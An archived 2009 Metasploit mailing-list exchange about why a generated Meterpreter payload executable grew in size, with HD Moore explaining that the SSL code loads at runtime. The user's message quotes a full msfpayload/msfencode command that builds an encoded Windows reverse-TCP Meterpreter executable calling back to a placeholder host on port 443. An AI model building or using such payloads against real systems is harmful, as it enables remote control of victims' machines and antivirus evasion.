Metasploit mailing list archives
Meterpreter + SSL
From: hdm at metasploit.com (HD Moore)
Date: Mon, 06 Jul 2009 22:20:55 -0500
On Mon, 06 Jul 2009 22:09:35 -0500, Willard Dawson <wfdawson at bellsouth.net> wrote:
That's cool. I wonder, though... Today, for the first time in a week or more, I used msfencode and shikata_ga_nai to make another instance of an .exe: ./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o rv_443.exe The resulting binary file was quite a bit larger than previously.
[..]
That is, it's feasible when the .scr file is only 112 lines, as was the case until recently. Now, my work results in a 600+ line file. I certainly won't be manipulating that sort of file manually!
The generated executable size has only changed from ~9k to ~10k in the recent months. The new SSL code is loaded at runtime over the network and does not affect the size of the generated executable. It sounds like something else may be the cause of the dramatic size increase you are seeing. -HD
Current thread:
- Meterpreter + SSL Willard Dawson (Jul 06)
- Meterpreter + SSL HD Moore (Jul 06)
- <Possible follow-ups>
- Meterpreter + SSL Dusk (Aug 22)